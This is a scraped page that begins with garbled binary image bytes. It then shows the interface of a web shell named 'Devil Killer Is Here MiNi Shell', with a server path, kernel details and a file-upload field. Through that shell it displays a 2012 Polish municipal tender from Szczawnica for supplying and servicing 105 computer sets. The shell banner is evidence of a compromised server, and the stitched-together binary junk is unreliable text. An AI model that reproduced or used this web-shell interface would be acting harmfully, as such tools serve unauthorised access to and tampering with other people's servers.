JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/521326-N-2012.html

<p class="kh_header"><b>Szczawnica: Internet w domach mieszkańców Szczawnicy nabór II etap I</b><br>
<b>Numer ogłoszenia: 521326 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Szczawnica , ul. Szalaya 103, 34-460 Szczawnica, woj. małopolskie, tel. 018 2622203, 2622530, faks 018 2622530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Internet w domach mieszkańców Szczawnicy nabór II etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1)	Zakup, dostawa, montaż i uruchomienie zestawu komputerowego

2)	Serwis sprzętu komputerowego

Ad. 1) Wykonawca zapewni dostawę oraz prawidłowy, poprawny, umożliwiający bezpieczne korzystanie montaż, podłączenie i uruchomienie zestawów komputerowych wraz z skonfigurowanym oprogramowaniem, sterownikami oraz peryferiami w miejscach wskazanych przez Zamawiającego (u osób z grupy docelowej projektu oraz jednostkach podległych  na terenie Miasta i Gminy Szczawnica) po uprzedniej konsultacji z Beneficjentem ostatecznym.
Zainstalowany system operacyjny powinien mieć utworzone konto administratora z ustawionym hasłem dostępu (przekazanym wyłącznie Zamawiającemu) i konto użytkownika z ograniczeniami bez hasła dostępu. 

Zamawiający wymaga sprzętu fabrycznie nowego wyprodukowanego co najmniej w 2012 r.

- Po dostawie, montażu i uruchomieniu zestawów komputerowych odebrane zostaną przez Wykonawcę od Beneficjentów ostatecznych oświadczenia o dokonaniu tej czynności zawierające co najmniej: numer seryjny komputera, monitora i peryferiów, datę, adres, imię i nazwisko i podpis osoby z grupy docelowej projektu lub w przypadku jednostki podległej z terenu Miasta i Gminy Szczawnica jej przedstawiciela oraz podpis Wykonawcy.

- Po dostawie, montażu i uruchomieniu zestawów komputerowych, o której mowa wyżej nastąpi zgłoszenie jej do odbioru przez Wykonawcę Zamawiającemu, następnie ustalenie terminu odbioru, faktyczny odbiór, z którego zostaną sporządzone częściowe protokoły zdawczo-odbiorcze na miejscu wskazanym przez Zamawiającego u Beneficjentów ostatecznych. Protokoły powyższe podpisane zostaną przez: Zamawiającego oraz Dostawcę. Załącznikami do protokołów, o których mowa wyżej będę oświadczenia spisane pomiędzy Beneficjentami ostatecznymi a Wykonawcą.
 
Ad. 2) 
- Wykonawca zapewni serwis zestawów komputerowych wraz z monitorem i oprogramowaniem oraz peryferiów (aktualizacja, diagnostyka - sprawdzanie prawidłowości funkcjonowania całości zestawu, ustawienia, czyszczenie i konserwacja oraz naprawy i/lub wymiany, których obejmuje i nie obejmuje gwarancja, wynikające również z przyczyn leżących po stronie użytkownika tj. także wynikających z wadliwego użytkowania z wyłączeniem uszkodzeń mechanicznych nie spowodowanych wadą produkcyjną albo wadą materiałową) na miejscu wskazanym przez Zamawiającego (u osób z grupy docelowej projektu oraz w jednostkach podległych na terenie Miasta i Gminy Szczawnica) przez okres 36 miesięcy od dnia podpisania końcowego protokołu zdawczo - odbiorczego bez uwag dla usługi dostępu do internetu określonego odrębnym postępowaniem przetargowym.

- W przypadku, gdy naprawa nie będzie możliwa Wykonawca zapewni wymianę oprogramowania i/lub zestawów komputerowych i/lub uszkodzonych podzespołów i/lub monitorów i/lub peryferiów na identyczne lub równoważne lub o wyższych parametrach z zachowaniem gwarancji oraz pozostałych uprawnień nabytych z pierwotnym sprzętem.
Czas reakcji serwisu od chwili zgłoszenia do 48 godzin w dni robocze. Maksymalny czas usunięcia usterki do 5 dni kalendarzowych od chwili zgłoszenia.
W przypadku niemożności dokonania naprawy w miejscu użytkowania sprzętu Wykonawca zobowiązuje się zapewnić na czas naprawy sprzęt zastępczy o parametrach nie gorszych niż sprzęt zabrany do naprawy.
Zamawiający ma prawo żądać wymiany zestawu komputerowego wraz z peryferiami na nowy zestaw po trzykrotnej jego naprawie.

- Osoby z grupy docelowej projektu mogą się zmieniać przez okres trwania umowy lub ich miejsce zamieszkania/położenia w przypadku jednostek podległych - adres, więc Wykonawca będzie musiał zmieniać miejsce instalacji sprzętu łącznie z jego przemieszczeniem na takich samych warunkach, jak przy pierwszej dostawie, montażu, podłączeniu i uruchomieniu zestawów komputerowych na terenie Miasta i Gminy Szczawnica oraz zezwolić Zamawiającemu na taką zmianę bez utraty praw gwarancyjnych, serwisowych oraz pozostałych wynikających z umowy i przetargu. Zamawiający będzie zgłaszał takie zmiany pisemnie lub faksem pod adresem/numerem wskazanym przez Wykonawcę zgodnie ze złożoną ofertą.
Potwierdzenie wysłania faksu lub listu będzie uważane za dowód przyjęcia zgłoszenia.
Czas na zmianę instalacji sprzętu, położenia także w przypadku jednostek podległych wynosi do 5 dni kalendarzowych, po którym nastąpi odbiór jakościowo - ilościowy zakończony podpisaniem protokołu przez Zamawiającego, Wykonawę oraz osobę z grupy docelowej projektu lub w przypadku jednostki podległej z terenu Miasta i Gminy Szczawnica ich przedstawiciela. 
Zmiana miejsca instalacji sprzętu także w przypadku jednostek podległych zostanie dokonana w ramach niniejszego zamówienia, tj. bez dodatkowego wynagrodzenia.

- Gwarancja powinna posiadać takie warunki, aby działania serwisowe Wykonawcy nie powodowały utraty gwarancji w przeciwnym wypadku Wykonawca przejmuje na siebie gwarancję.

- Pod koniec trzeciego roku obowiązywania serwisu należy dokonać modernizacji zestawów komputerowych zwiększając im pamięć operacyjną przynajmniej dwukrotnie oraz dodając dysk twardy pojemniejszy i szybszy od zamontowanych dla desktopów wewnętrzny, a dla laptopów dysk zewnętrzny.
Jeżeli peryferia będą nosiły ślady znacznego zużycia (umożliwiające prawidłowe, poprawne i bezpieczne korzystanie) należy je także wymienić (np. wytarte znaki na klawiaturze, przetarty zewnętrzny kabel myszy)
Dodawane podzespoły / peryferia powinny być fabrycznie nowe i z gwarancją producenta min. 2 lata i wyprodukowane nie wcześniej niż 1 rok od daty modernizacji przedmiotu zamówienia. 
Należy dokonać także aktualizacji sterowników i oprogramowania w wersjach stabilnych aktualnych na dzień modernizacji przedmiotu zamówienia.
Modernizacja zestawów komputerowych także w przypadku jednostek podległych zostanie dokonana w ramach niniejszego zamówienia, tj. bez dodatkowego wynagrodzenia.


Po dokonanej modernizacji zestawów komputerowych odebrane zostaną przez Wykonawcę od Beneficjentów ostatecznych oświadczenia o dokonaniu tej czynności zawierające co najmniej: nazwę modernizowanych podzespołów z ich numerem seryjnym, datę, adres, imię i nazwisko i podpis osoby z grupy docelowej projektu lub w przypadku jednostki podległej z terenu Miasta i Gminy Szczawnica jej przedstawiciela oraz podpis Wykonawcy.

Po dokonaniu modernizacji, o której mowa wyżej nastąpi zgłoszenie jej do odbioru przez Wykonawcę Zamawiającemu, następnie ustalenie terminu odbioru, faktyczny odbiór, z którego zostaną sporządzone częściowe protokoły zdawczo-odbiorcze na miejscu wskazanym przez Zamawiającego u Beneficjentów ostatecznych. Protokoły powyższe podpisane zostaną przez: Zamawiającego oraz Wykonawcę. Załącznikami do protokołów, o których mowa wyżej będę oświadczenia spisane pomiędzy Beneficjentami ostatecznymi a Wykonawcą.

- Wykonawca zapewni w okresie 3 lat kontrole ewentualnych nadużyć (np. kradzież, udostępnienie, zniszczenie, rozkręcenie, samowolną modernizację) oraz przegląd sprzętowo-programowy przynajmniej raz w roku, po którym dostarczy stosowny raport.
Pierwsza kontrola w 12, druga w 24, trzecia w 35 miesiącu trwania serwisu licząc od dnia podpisania końcowego protokołu zdawczo-odbiorczego bez uwag dla usługi dostępu do internetu określonego odrębnym postępowaniem przetargowym.
- Wartość takiego serwisu określona zostanie zgodnie z wzorem formularza oferty.

Wykonawca zobowiązuje się w czasie realizacji przedmiotu zamówienia zapewnić należny ład, porządek, przestrzeganie przepisów bezpieczeństwa i BHP, ochronę znajdujących się na terenie montażu urządzeń i sieci oraz utrzymanie ich w należytym stanie technicznym. Za powstałe szkody w tym za szkody wyrządzone osobom trzecim odpowiada Wykonawca. W razie uszkodzenia lub zniszczenia istniejących sieci i urządzeń w czasie realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do ich naprawienia i doprowadzenia do stanu poprzedniego na własny koszt.

Za przedmiot zamówienia  do momentu końcowego odbioru bez uwag odpowiedzialność ponosi  Dostawca.

Rozmieszczenie i ilość zestawów (105 szt.):
- 10 zestawów z laptopami - Szkoła Podstawowa nr 3 w Szlachtowej
- 2 zestawy z laptopami - Miejski Ośrodek Kultury w Szczawnicy
- 15 zestawów komputerowych desktop - Szkoła Podstawowa nr 1 w Szczawnicy
- 15 zestawów komputerowych desktop - Gimnazjum Publiczne w Szczawnicy
- 3 zestawy komputerowe desktop - Miejska Biblioteka Publiczna w Szczawnicy
- 60 zestawów komputerowych desktop - do osób z grupy docelowej projektu. 

Lista adresów osób oraz jednostek podległych dostępna nieodpłatnie  na pisemny wniosek Wykonawcy. 

Lista zawierająca kompletne dane osób z grupy docelowej projektu oraz jednostek podległych z terenu Miasta i Gminy Szczawnica będzie stanowić załącznik do umowy.

Rozwiązania równoważne
Zamawiający informuje, że ilekroć przedmiot zamówienia określony w siwz i w załącznikach do specyfikacji istotnych warunków zamówienia opisany jest przez wskazanie znaku towarowego, patentu lub pochodzenia dopuszcza się rozwiązania równoważne, z zastrzeżeniem, iż proponowane rozwiązania (materiały, urządzenia) będą posiadały parametry techniczne nie gorsze niż wymagane przez zamawiającego, posiadały wymagane atesty, spełniały normy. Zamawiający dopuszcza możliwość składania ofert równoważnych w zakresie zaproponowanych materiałów i urządzeń przedstawionych w dokumentacji technicznej pod warunkiem, że będą posiadały lepsze parametry techniczne. W przypadku zaproponowania w ofercie materiałów równoważnych, należy załączyć do oferty foldery, dane techniczne i aprobaty techniczne tych materiałów. Zaoferowane urządzenia i materiały równoważne muszą posiadać stosowne, wymagane przepisami prawa atesty lub dopuszczenia do obrotu gospodarczego tak, aby zamawiający mógł sprawdzić czy odpowiadają one wymaganiom postawionym w siwz., należy także dołączyć oświadczenia producenta o równoważności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.00.00-0, 30.23.70.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował zadanie lub zadania, w co najmniej następującym zakresie: co najmniej jedną dostawę zestawów komputerowych typu stacjonarnego (minimalny skład zestawu komputerowego: komputer (jednostka centralna), monitor, klawiatura, myszka) z montażem o wartości co najmniej 100 000 zł netto lub co najmniej jedną dostawę zestawów komputerowych przenośnych typu laptop o wartości co najmniej 100 000 zł netto.


Wykonawca winien wykazać, ze dostawy zostały wykonane należycie. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Sprawdzenie ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia.

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów. 
W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował tymi zasobami tj. przedstawi podstawy do dysponowania tymi osobami, a w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Sprawdzenie ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wysokość posiadanych środków finansowych lub zdolność kredytową. Sprawdzenie ww warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów wg zasady spełnia  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu na druku według załącznika nr 4 do siwz.
- Informacja złożona na podstawie art. 36 ust. 4 Ustawy o części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - oświadczenie zawiera formularz oferty druk wg załącznika nr 1 do siwz.
- Zgodnie z art. 23 ust. 1 Ustawy Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub mocodawcę) musi być dołączone do oferty - o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. Wykonawcy występujący wspólnie mogą złożyć tylko jedną ofertę. Dokumenty wymienione w pkt. 2 (w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 Ustawy) winien dołączyć każdy podmiot występujący wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:
1.	Zmiany danych teleadresowych, osób reprezentujących firmę, osób wykazanych do realizacji zamówienia i przedstawionych w umowie na inne - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
2.	Zmian podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego.
3.	Rozszerzenia zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego.
4.	Zmiany osoby / osób wskazanych w umowie jako nadzorujących wykonanie zamówienia.
5.	Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a.	zawieszenia wykonania zamówienia przez Zamawiającego,
b.	zmiany terminu dokonania dostaw lub odbioru przewidzianych w umowie,
c.	protestów mieszkańców,
d.	siły wyższej, 
e.	przedłużającego się postępowania odwoławczego,
- na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego
6.	Zmiany sposobu realizacji przedmiotu zamówienia w postaci:
- konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacjach, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
7.	Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części zamówienia lub obniżenia wynagrodzenia z powodu zastosowanych rozwiązań zamiennych wraz z określeniem maksymalnej wielkości tych zakresu zmian i określeniem kwoty należnej za tą część.
Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy zmiana danych związanych 
z obsługą administracyjno-organizacyjną umowy (np. zmiana konta bankowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
